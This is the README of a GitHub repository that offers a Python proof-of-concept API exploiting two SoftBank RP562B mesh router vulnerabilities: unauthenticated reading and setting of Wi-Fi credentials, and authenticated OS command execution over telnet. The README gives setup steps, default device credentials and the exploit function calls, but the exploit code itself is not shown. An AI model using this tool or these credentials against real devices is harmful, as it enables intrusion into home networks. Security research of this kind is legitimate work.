Skip to content

PoC API that exploits multiple vulnerabilities in SoftBank RP562B mesh device.

Notifications You must be signed in to change notification settings

0xNslabs/SoftBankMeshAPI

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SoftBank Mesh RP562B - Exploit Wrapper API

Overview

This repository contains a Python API to exploit known vulnerabilities on SoftBank Wi-Fi Mesh RP562B, allowing unauthenticated attackers to obtain information about devices connected through Wi-Fi (CVE-2024-47799) and authenticated attackers to execute arbitrary OS commands (CVE-2024-45827).

SoftBank Mesh API RP562B Exploits API

Prerequisites

  • Python 3.x
  • Required Python packages listed in requirements.txt

Installation

  1. Clone the repository:

    git clone https://github.com/0xNslabs/SoftBankMeshAPI
    cd SoftBankMeshAPI
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

Configuration

Before running the script, you need to configure the device dictionary in main.py with the appropriate details:

device = {
    "mesh_ip": "INSERT_YOUR_DEVICE_IP",
    "mesh_username": "user",
    "mesh_password": "RTconf01",
    "wifi_name": "ThePromisedLan",
    "wifi_password": "00000000",
}

Exploiting Vulnerabilities

Unauthenticated Access to Wi-Fi Credentials (CVE-2024-47799)

To obtain Wi-Fi credentials without authentication, use the getWifiCreds function:

response = sbmeshAPI.getWifiCreds(device)
print(response)

To set Wi-Fi credentials without authentication, use the setWifiCreds function:

response = sbmeshAPI.setWifiCreds(device)
print(response)

Authenticated Remote Command Execution (CVE-2024-45827)

To execute an arbitrary OS command with authentication, use the execTelnetRce function:

response = sbmeshAPI.execTelnetRce(device)
print(response)

Write-Up

https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b

Video Proof of Concept

Script PoC CVE-2024-47799 Remote Command Injection

Disclaimer

This software is intended for educational and research purposes only. Unauthorized access to computer systems is illegal and unethical. The authors and contributors of this software are not responsible for any misuse or damage caused by this software.